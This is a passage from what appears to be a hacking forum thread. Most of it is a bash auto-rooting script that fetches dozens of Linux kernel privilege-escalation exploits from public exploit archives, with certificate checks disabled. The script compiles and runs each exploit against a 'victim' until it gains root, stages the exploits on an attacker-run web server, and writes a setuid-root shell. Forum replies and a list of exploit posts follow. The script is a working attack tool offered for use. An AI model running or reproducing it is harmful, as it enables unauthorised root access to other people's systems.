          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c 
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c 
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c

          # Getting 32-bit only exploit to lin_x86 directory
          cd /var/www/html/exploits/lin_x86/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux_x86/local/9542.c

          # Getting the compressed exploits to sploits directory
          cd /var/www/html/exploits/sploits

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/39772.zip
          sudo wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/33395.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/40489.zip

          # Getting CVE-2016-2384 exploit to gitex directory 
          cd /var/www/html/exploits/gitex

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gitaddress/poc.c
          sudo wget --no-check-certificate $gitaddress/poc.py
      }

      function valid_ip()
      {
          if ! [ "$2" ]; then
              echo -e "${red}${bold}IP Not Provided, Please provide an IP"
          else
              if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

                  for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
                  do
                    (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
                  done
              else
                  echo -e "${light_green}========================================"
                  echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
                  echo -e "========================================"
                  exit 1;
              fi
          fi
      }

      #gaddress=$1'/exploits'
      #saddress=$1'/exploits'
      #gitaddress=$1'/exploits/gitex'
      function exploiter(){

          checkroot() {
              if [ $(id -u) == 0 ]; then
              echo
              echo -e "${light_red}Successfully R00T(ed).. have fun :)"
              id=$(id)
              echo -e "${light_red}ID     => ${light_green}" $id
              who=$(whoami)
              echo -e "${light_red}WHOAMI => ${light_green}" $who
              exit
              else
              echo ""
              echo -e "${light_red}R00Ting.. ${light_green}"
              sleep 1
              fi
          }
          ccmpl(){
              gcc exploit.c -o exploit -lutil -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -m32 -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lkeyutils -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -pthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -static -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -fPIC -shared -o exploit exploit.c -ldl -w
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -O2 exploit.c
              gcc -O2 -fomit-frame-pointer exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c -static -O2
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -pthread exploit.c -o exploit -lcrypt
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -m64 -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
          }
          shcmpl(){
              bash exploit.sh
              rm exploit.sh
              rm *.c
              checkroot;
          }
          pycmpl(){
              python exploit.py
              rm exploit.py
              rm *.c
              checkroot;
          }
          echo -e "${light_red}Auto R00Ting started...${light_green}"

          checkroot;
          #c
          wget --no-check-certificate $gaddress/linux/local/2031.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/17391.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/18411.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33321.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35161.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5092.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8572.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86/local/9542.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25202.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33322.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40812.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/37292.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2013.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5093.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8673.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/10613.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40003.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2004.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15704.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25444.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/30604.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33824.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41994.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2005.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15285.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41995.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2006.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40616.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33336.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39166.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41886.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/1397.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/27297.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39277.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/718.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8678.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41458.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40839.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35370.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/38390.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39230.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/42183.c -O exploit.c
          ccmpl;

          #sh
          wget --no-check-certificate $gaddress/linux/local/2011.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/8478.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/10018.sh -O exploit.sh
          shcmpl;

          #py
          wget --no-check-certificate $gaddress/linux/local/9844.py -O exploit.py
          pycmpl;
          wget --no-check-certificate $gaddress/linux/local/12130.py -O exploit.py
          pycmpl;

          #txt
          #platforms/linux/local/9191.txt
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/39772.txt
          wget --no-check-certificate $saddress/bin-sploits/39772.zip
          cd 39772
          unzip 39772.zip
          tar -xf exploit.tar
          cd ebpf_mapfd_doubleput_exploit
          bash compile.sh
          ./hello
          ./doubleput
          ./suidhelper
          cd ..
          rm -rf ebpf_mapfd_doubleput_exploit
          rm -rf exploit.tar
          checkroot;
          tar -xf crasher.tar
          cd ebpf_mapfd_doubleput_crasher
          bash compile.sh
          ./doubleput
          cd ..
          rm -rf ebpf_mapfd_doubleput_crasher
          rm -rf 39772
          rm -rf 39772.zip
          checkroot;
          #platforms/linux/local/23674.txt
          smbmount --version
          ls -l /usr/bin/smbmount
          ls -l /usr/bin/smbmnt
          echo "main(){setuid(0);setgid(0);system("/bin/bash");}" > a.c
          make a
          cc a.c -o a
          chmod +s a
          share:/etc/samba/smb.conf
          /etc/samba/smb.conf
          [share]
          path = /data/share
          writable = no
          locking = no
          public = yes
          guest ok = yes
          comment = Share
          ls -l a
          ls -l pokus/a
          id
          checkroot;
          #platforms/linux/local/29714.txt
          wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          tar -zxf 29714.tgz
          cd exploit
          make
          make install
          cd ..
          rm -rf exploit
          rm -rf 29714.tgz
          checkroot;
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/33395.txt
          wget $saddress/bin-sploits/33395.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          checkroot;
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          #platforms/linux/local/40489.txt
          wget --no-check-certificate $saddress/bin-sploits/40489.zip
          unzip 40489.zip
          cd 40489
          bash compile.sh
          ./pwn
          ./enjoy
          cd ..
          rm -rf 40489
          rm -rf 40489.zip
          checkroot;
          #platforms/linux/local/41770.txt
          # #!/bin/bash
          # (./ProcReadHelper /proc/$$/syscall) &
          # sleep 1
          # exec /usr/bin/passwd
          # #!/bin/bash
          # echo "Current pid is $$"
          # (sleep 10; echo 127 ) > /proc/$$/coredump_filter &
          # sleep 5
          # exec /usr/bin/passwd
          # static ssize_t mem_read(struct file * file, char __user * buf,
          #                         size_t count, loff_t *ppos) {
          #     if (file->private_data != (void*)((long)current->self_exec_id))
          #         goto out_put;
          # #!/bin/bash
          # (sleep 3; echo 15) > /proc/$$/oom_adj &
          # exec /usr/bin/passwd
          # checkroot;
          #platforms/linux/local/38559.txt
          rmmod b43
          modprobe b43 fwpostfix=AA%xBB
          dmesg
          checkroot;
          #platforms/linux/local/41999.txt
          wget --no-check-certificate $gitaddress/poc.c -O poc.c
          gcc poc.c -masm=intel
          ./a.out 0
          checkroot;
          ./a.out 1
          checkroot;
          ./a.out 2
          checkroot;
          ./a.out 3
          checkroot;
          ./a.out 4
          checkroot;
          ./a.out 5
          checkroot;
          ./a.out 6
          checkroot;
          ./a.out 7
          checkroot;
          ./a.out 8
          checkroot;
          ./a.out 9
          checkroot;
          ./a.out 10
          checkroot;
          rm a.out
          rm poc.c
          wget --no-check-certificate $gitaddress/poc.py -O poc.py
          python poc.py
          checkroot;
          rm poc.py
          rm a.out
          rm exploit
          
          echo -e "${light_red}Srry.. I tried hard, but no luck this time.. Wait for update :("
          exit 1;
      }


      if ! [ "$1" ] || [ "$1" == '-h' ]  || [ "$1" == '--help' ] ; then #|| ! [ "$2" ]; then
          lauto_root
          desc
      fi

      if [ "$1" == '-a' ] || [ "$1" == '--arsenal' ] ; then
          lauto_root
          sleep 2 
          echo -e "\n${light_green}=================================="
          echo -e "#   ${light_red}Initiating Arsenal script   ${light_green} #"
          echo -e "==================================\n"
          # original line gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms'
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          # original line saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-6074'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308'
          local_dir
          arsenal
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Local Arsenal Set..  ${light_green}#"
          echo -e "==========================\n"
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Starting Apache2     ${light_green}#"
          echo -e "==========================\n"
          /bin/bash -i /etc/init.d/apache2 start
          /bin/bash -i /etc/init.d/apache2 status
          echo -e "${light_green}=================================="
          echo -e "#    ${light_red}Run Exploiter on Victim     ${light_green}#"
          echo -e "==================================\n"

          exit 1;
      fi 

      if [ "$1" == '-l' ] || [ "$1" == '--Lroot' ] ; then
          lauto_root
          if ! [ "$2" ]; then
              echo -e "\n${light_red}No IP address provided!!!\n"
              exit 1;
          else     
              ip=$2
          fi

          if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

              for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
              do
                (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
              done
          else
              echo -e "${light_green}========================================"
              echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
              echo -e "========================================\n"
          fi    

          sleep 2 
          echo -e "${light_green}=================================="
          echo -e "#   ${light_red}Initiating Local Exploiter   ${light_green}#"
          echo -e "==================================\n"
          gaddress='http://'${ip}'/exploits'
          saddress='http://'${ip}'/exploits'
          gitaddress='http://'${ip}'/exploits/gitex'
          exploiter
          exit 1;
      fi

      if [ "$1" == '-r' ] || [ "$1" == '--Rroot' ] ; then
          lauto_root
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          sleep 2 
          echo -e "${light_green}==================================="
          echo -e "#   ${light_red}Initiating Remote Exploiter   ${light_green}#"
          echo -e "===================================\n"
          exploiter
          exit 1;
      fi


       

      thanks for share

      Excellent a fellow bash coder, add me => MODERATED BY ADMIN (jabber)

      Ive got some "HQ" stuff to show you.

      Edited by dEEpEst
      No emails in public

      Share this post

      Link to post
      Share on other sites

      bash818    187

      bash818
      Posted
      10 hours ago, bash818 said:

      Excellent a fellow bash coder, add me => MODERATED BY ADMIN (jabber)

      Ive got some "HQ" stuff to show you.

      Its a jabber..

      Share this post

      Link to post
      Share on other sites

      dEEpEst    22,289

      dEEpEst
      Posted
      hace 2 horas, bash818 dijo:

      Its a jabber..

      @bash818 You can not put emails in the forum, or jabbers or anything similar. If you want to contact him use the private message.
      You should know the rules.:close_tema:

      • Like 1
      • Thanks 1

      Share this post

      Link to post
      Share on other sites
      Guest
      This topic is now closed to further replies.
      Go To Topic Listing Pentesting

      • Similar Content

        • 1337day-Exploits
          VirtualBox COM RPC Interface Code Injection / Privilege Escalation
          By 1337day-Exploits
          The hardened VirtualBox process on a Windows host does not secure its COM interface leading to arbitrary code injection and elevation of privilege.

          Hidden Content
          Give reaction to this post to see the hidden content.
        • 1337day-Exploits
          Linux Overflow Via FUSE
          By 1337day-Exploits
          Linux suffers from a page->_refcount overflow via FUSE with ~140GiB RAM usage.

          Hidden Content
          Give reaction to this post to see the hidden content.
        • 1337day-Exploits
          Linux Siemens R3964 Line Discipline Missing Lock
          By 1337day-Exploits
          The Siemens R3964 line discipline code in drivers/tty/n_r3964.c has a few races around its ioctl handler; for example, the handler for R3964_ENABLE_SIGNALS just allocates and deletes elements in a linked list with zero locking. This code is reachable by an unprivileged user if the line discipline is enabled in the kernel config; Ubuntu 18.04, for example, ships this line discipline as a module.

          Hidden Content
          Give reaction to this post to see the hidden content.
        • itsMe?
          Mastering Kali Linux for Advanced Penetration Testing [E-Book]
          By itsMe?

          Hidden Content
          Give reaction to this post to see the hidden content.  
          This E-book is for the people who considered as an advance pentester and was wanting to do more pentesting with Kali Linux. Be aware, this book is for advance users so if you are not familiar with Kali Linux for the most part, don't read this ebook (maybe)

          Hidden Content
          Give reaction to this post to see the hidden content.